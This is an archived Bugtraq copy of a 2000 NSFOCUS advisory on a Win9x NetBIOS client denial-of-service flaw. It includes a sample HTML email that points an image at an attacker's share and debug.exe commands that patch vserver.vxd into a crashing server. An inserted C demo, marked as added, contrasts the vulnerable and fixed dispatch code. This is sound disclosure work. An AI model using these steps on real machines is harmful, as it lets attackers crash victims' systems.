Bugtraq mailing list archives

NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability


From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Thu, 12 Oct 2000 11:22:44 +0800

NSFOCUS Security Advisory(SA2000-04)

Topic: Microsoft Win9x client driver type comparing vulnerability

Release Date: Aug 20, 2000
Update Date:  Oct 11, 2000

Affected System:
================
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows 98 Second Edition

Non-affected system:
===================
 - Microsoft Windows NT
 - Microsoft Windows 2000

Impact:
=========

NSFOCUS security team has found a security flaw in the Microsoft Win9x NetBIOS file-sharing client.
By modifying his own file share service, a malicious attacker can perform a DoS attack against
any Win9x client that connects to it.

Description:
============

When a Win9x client connects to a NetBIOS file share, it compares the share (device) type
string returned by the server against the five types it knows: "?????", " A:", " LPT1:",
" COMM" and "IPC". If the server returns a string that matches none of them, the comparison
yields a sixth result, which is invalid because only five types exist. The client converts
that result into a function pointer without validating it, so it obtains a wrong pointer,
transfers control to a wrong function address, and crashes.
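The dispatch pattern described above, as an added illustration in C. This is not Win9x code and not from NSFOCUS: the five type strings come from the advisory, but the handler table, the handler return values and the constructed sample responses are assumptions made for the demo. The vulnerable version indexes the handler table with the unmatched "sixth" result; the hardened version rejects it before it becomes a pointer.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The five share-type strings the advisory says the Win9x client
   recognises, with the leading spaces as the advisory quotes them. */
static const char *const kServiceNames[] = {
    "?????", " A:", " LPT1:", " COMM", "IPC"
};
#define NUM_SERVICES (sizeof kServiceNames / sizeof kServiceNames[0])

/* One handler per share type. The return values are labels for this
   demo only, not Win9x internals. */
typedef int (*ServiceHandler)(const char *share);
static int on_wildcard(const char *share) { (void)share; return 0; }
static int on_disk(const char *share)     { (void)share; return 1; }
static int on_printer(const char *share)  { (void)share; return 2; }
static int on_comm(const char *share)     { (void)share; return 3; }
static int on_ipc(const char *share)      { (void)share; return 4; }

/* Exactly NUM_SERVICES entries: there is no sixth slot. */
static const ServiceHandler kHandlers[NUM_SERVICES] = {
    on_wildcard, on_disk, on_printer, on_comm, on_ipc
};

/* Map the type string to a table index. When nothing matches, the loop
   falls through and returns NUM_SERVICES: the "sixth result". */
static size_t lookup_service(const char *svc) {
    size_t i;
    for (i = 0; i < NUM_SERVICES; i++)
        if (strcmp(svc, kServiceNames[i]) == 0)
            return i;
    return NUM_SERVICES;
}

/* 1 if the blind dispatch below would read past the end of kHandlers. */
static int would_dispatch_out_of_bounds(const char *svc) {
    return lookup_service(svc) >= NUM_SERVICES;
}

/* Vulnerable pattern: the index is used without a range check. For an
   unrecognised type this reads kHandlers[NUM_SERVICES], one past the
   table, and calls whatever happens to sit there. Only call this with a
   type that would_dispatch_out_of_bounds() reports as safe. */
static int dispatch_vulnerable(const char *svc, const char *share) {
    size_t idx = lookup_service(svc);
    return kHandlers[idx](share);
}

/* Hardened pattern: reject the sixth result before it becomes a pointer.
   -1 means "unknown share type, refuse the connection". */
static int dispatch_hardened(const char *svc, const char *share) {
    size_t idx = lookup_service(svc);
    if (idx >= NUM_SERVICES)
        return -1;
    return kHandlers[idx](share);
}

int main(void) {
    /* Constructed sample server responses: four ordinary ones and one
       that a modified server might send. */
    const char *samples[] = { " A:", "IPC", " LPT1:", " COMM", "JUNK" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *svc = samples[i];
        if (would_dispatch_out_of_bounds(svc))
            printf("%-8s vulnerable: would index kHandlers[%zu] of %zu (crash); "
                   "hardened: %d\n", svc, lookup_service(svc),
                   (size_t)NUM_SERVICES,
                   dispatch_hardened(svc, "\\\\server\\share"));
        else
            printf("%-8s vulnerable: %d  hardened: %d\n", svc,
                   dispatch_vulnerable(svc, "\\\\server\\share"),
                   dispatch_hardened(svc, "\\\\server\\share"));
    }
    return 0;
}
```

The fix is not the extra comparison itself but where it sits: the "not found" sentinel must be checked on the path that turns the lookup result into a code pointer, because the lookup function cannot know how its return value will be used.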

A malicious user can also deliver the attack by sending an HTML email to the target.
A sample message looks like this:

<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
</body>
</html>

When a Win9x client reads such an HTML email in Outlook Express or another mail client
with HTML support, the image reference makes it connect to the attacker's share, and the
client crashes (DoS).

Exploits:
==========

The following was done on Windows 98 Second Edition, English version:

D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
-n vserver.bak    (backup)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

Reboot the machine. (The three bytes written at offset 2B60h, 33 C0 C3, are
xor eax,eax / ret: the routine now zeroes EAX and returns immediately instead of
running the comparisons shown in the dump above.)

Set a password on a shared directory on the patched machine.

Access that share from another Win9x client.
Usually the client gets a "blue screen"; the system then becomes unstable
or halts.

Workaround:
====================

Do not access file shares on untrusted hosts.
Disable NetBIOS over TCP/IP.


Solutions:
====================

Microsoft has been informed.

DISCLAIMER:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT
WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR
REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY
IS NOT MODIFIED IN ANY WAY.

(c) 1999-2000 Nsfocus. All rights reserved. Terms of use.


Nsfocus Security Team <security () nsfocus com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

